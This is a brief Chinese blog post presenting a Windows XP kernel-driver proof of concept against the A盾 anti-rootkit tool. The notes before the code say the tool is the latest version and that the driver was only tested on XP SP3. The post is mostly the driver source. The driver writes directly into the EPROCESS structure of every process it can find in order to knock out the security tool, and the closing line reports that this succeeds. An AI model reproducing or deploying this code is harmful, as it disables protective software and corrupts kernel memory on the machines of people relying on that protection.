1.A盾为最新版本(2012-06-01 A盾电脑防护 v0.2.6 快乐儿童版)。
2.驱动只在XP Sp3下测试有效。
3.A盾在我机器上驱动老是加载失败啊。
测试代码:
/*******************************************
* AUTHOR : 莫灰灰
* DATE : 2012-6-5
* BOLG : http://blog.csdn.net/hu3167343
*******************************************/
#include <ntddk.h>
NTSTATUS
PsLookupProcessByProcessId(
IN HANDLE ProcessId,
OUT PEPROCESS *Process
);
NTSTATUS
DriverEntry(
IN PDRIVER_OBJECT pDriverObj,
IN PUNICODE_STRING pRegistryString
)
{
int i = 0;
PEPROCESS pEprocess = NULL;
NTSTATUS status;
for ( i = 0; i < 5000; i += 4 )
{
status = PsLookupProcessByProcessId((HANDLE)i, &pEprocess);
if (NT_SUCCESS(status))
{
*(PULONG)((ULONG)pEprocess + 0x78) = 1;
}
}
return STATUS_SUCCESS;
}
驱动加载之后,A盾就悲催了。